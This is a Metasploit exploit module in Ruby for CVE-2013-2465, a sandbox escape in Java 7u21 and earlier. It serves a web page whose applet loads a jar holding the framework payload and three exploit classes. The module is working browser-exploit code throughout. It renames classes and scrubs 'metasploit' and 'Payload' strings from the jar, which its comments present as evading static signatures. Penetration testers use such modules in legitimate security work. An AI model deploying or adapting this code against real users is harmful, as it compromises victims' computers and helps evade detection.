##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
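class MetasploitModule < Msf::Exploit::Remote
  # GreatRanking rather than Excellent: the memory corruption itself is reliable,
  # but the module does not bypass click-to-play and Java now defaults to the
  # "High" security level, so the victim has to approve the applet.
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  # Browser exploit for CVE-2013-2465 (Java 7u21 and earlier). The HTTP server
  # hands out a tiny page with an <applet> tag; the referenced .jar carries the
  # framework's Java payload plus three pre-built exploit classes, with every
  # recognisable class/string name randomised per run (see setup/generate_jar).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
        'Description' => %q{
          This module abuses an Invalid Array Indexing Vulnerability on the
          static function storeImageArray() function in order to cause a
          memory corruption and escape the Java Sandbox. The vulnerability
          affects Java version 7u21 and earlier. The module, which doesn't bypass
          click2play, has been tested successfully on Java 7u21 on Windows and
          Linux systems.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # From PacketStorm
          'sinn3r', # Metasploit
          'juan vazquez' # Metasploit
        ],
        'References' => [
          [ 'CVE', '2013-2465' ],
          [ 'OSVDB', '96269' ],
          [ 'EDB', '27526' ],
          [ 'PACKETSTORM', '122777' ],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
        ],
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-08-12',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Pick random names for the three exploit classes, load the pre-built .class
  # files from data/exploits/CVE-2013-2465 and rewrite them with those names,
  # then hand over to the framework's own setup. Raises Errno::ENOENT (from
  # File.binread) if a class file is missing from the data directory.
  def setup
    @exploit_class_name = rand_text_alpha('Exploit'.length)
    @color_model_class_name = rand_text_alpha('MyColorModel'.length)
    @color_space_class_name = rand_text_alpha('MyColorSpace'.length)

    # Old name => new name, applied in this order. Each replacement has exactly
    # the length of the original, which is what keeps the length-prefixed
    # strings in the class files' constant pool valid after a raw byte rewrite.
    renames = {
      'Exploit' => @exploit_class_name,
      'MyColorModel' => @color_model_class_name,
      'MyColorSpace' => @color_space_class_name
    }

    @exploit_class = load_exploit_class('Exploit.class', renames)
    @color_model_class = load_exploit_class('Exploit$MyColorModel.class', renames)
    @color_space_class = load_exploit_class('Exploit$MyColorSpace.class', renames)

    # Framework setup runs last so the class bytes are ready before serving.
    super
  end

  # Read +file_name+ from data/exploits/CVE-2013-2465 in binary mode and apply
  # every +renames+ pair (old => new, equal lengths) to the raw bytes.
  # Returns the rewritten class bytes as a binary String.
  def load_exploit_class(file_name, renames)
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2013-2465', file_name)
    bytes = File.binread(path)
    renames.each { |old_name, new_name| bytes.gsub!(old_name, new_name) }
    bytes
  end

  # Request router. A URI ending in ".jar" gets the applet archive and arms the
  # payload handler for this client; any other URI that does not end in "/" is
  # redirected to the resource root (so the relative archive= in the applet tag
  # resolves); the root itself gets the applet page.
  def on_request_uri(cli, request)
    vprint_status("Requesting: #{request.uri}")

    # \z rather than $: $ also matches before an embedded newline, so the old
    # pattern could be satisfied by a URI whose first line ended in ".jar".
    if request.uri =~ /\.jar\z/i
      print_status('Sending .jar file...')
      send_response(cli, generate_jar(cli), { 'Content-Type' => 'application/java-archive' })

      handler(cli)
      return
    end

    unless request.uri.end_with?('/')
      vprint_status('Sending redirect...')
      send_redirect(cli, "#{get_resource}/", '')
      return
    end

    print_status('Sending HTML...')
    send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
  end

  # Build the landing page: an <applet> tag with a random archive name and the
  # randomised exploit class as code=. The archive name only has to end in
  # ".jar" for on_request_uri to serve it; the rest is never checked.
  def generate_html
    jar_name = rand_text_alpha(rand(5..7))
    <<~HTML
      <html>
      <head>
      </head>
      <body>
      <applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">
      </applet>
      </body>
      </html>
    HTML
  end

  # Assemble the applet archive for +cli+: the framework's Java payload jar with
  # the three exploit classes added, then every entry name and byte stream
  # rewritten so the literal strings "metasploit" and "Payload" no longer appear
  # (presumably to dodge trivial static signatures). Replacements are the same
  # length as the originals for the same constant-pool reason as in setup.
  # Returns the packed jar as a String.
  def generate_jar(cli)
    jar = regenerate_payload(cli).encoded_jar

    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
    jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)

    renames = {
      'metasploit' => rand_text_alpha('metasploit'.length),
      'Payload' => rand_text_alpha('payload'.length)
    }
    jar.entries.each do |entry|
      renames.each do |old_str, new_str|
        entry.name.gsub!(old_str, new_str)
        entry.data = entry.data.gsub(old_str, new_str)
      end
    end
    jar.build_manifest

    jar.pack
  end
end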